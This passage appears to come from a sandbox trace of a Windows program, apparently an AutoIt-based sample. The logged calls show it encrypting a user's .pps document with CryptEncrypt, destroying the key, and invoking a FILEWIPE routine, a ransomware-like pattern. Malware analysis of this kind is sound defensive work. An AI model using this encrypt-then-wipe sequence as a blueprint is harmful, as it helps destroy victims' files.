lpsz="_CRYPT_STARTUP") returned 0xe [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0034.434] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0034.434] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.434] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.434] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0034.435] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.435] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0034.435] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.436] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x8e5a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x8e60) returned 1 [0034.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.436] CharLowerBuffW (in: lpsz="byte[36449]", cchLength=0xb | out: lpsz="byte[36449]") returned 0xb [0034.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.437] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.437] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x96fb50*, pdwDataLen=0x6ae220*=0x8e5a, dwBufLen=0x8e60 | out: pbData=0x96fb50*, pdwDataLen=0x6ae220*=0x8e60) returned 1 [0034.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.437] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0034.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.437] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.437] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.437] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.437] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.438] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.438] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.438] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.438] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0034.438] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.439] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.440] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.440] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.440] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.440] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0034.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.440] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0034.440] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.440] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.440] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.440] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.440] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.440] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0034.441] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.441] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.441] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0034.441] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0034.441] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.441] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.441] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.441] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.441] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.441] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.441] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.441] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.441] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.442] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.442] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.442] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.442] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.442] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.444] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.444] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.444] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.444] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0034.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.445] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180d77d0, ftCreationTime.dwHighDateTime=0x1d5bd8a, ftLastAccessTime.dwLowDateTime=0x764685a0, ftLastAccessTime.dwHighDateTime=0x1d5b8f1, ftLastWriteTime.dwLowDateTime=0x764685a0, ftLastWriteTime.dwHighDateTime=0x1d5b8f1, nFileSizeHigh=0x0, nFileSizeLow=0x8e5a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="cJZMs2vLnTpB5-vCp3UM.pps", cAlternateFileName="CJZMS2~1.PPS")) returned 0x7c2100 [0034.445] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0034.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.445] CharLowerBuffW (in: lpsz="byte[36442]", cchLength=0xb | out: lpsz="byte[36442]") returned 0xb [0034.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.445] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.446] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.446] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.446] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.446] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 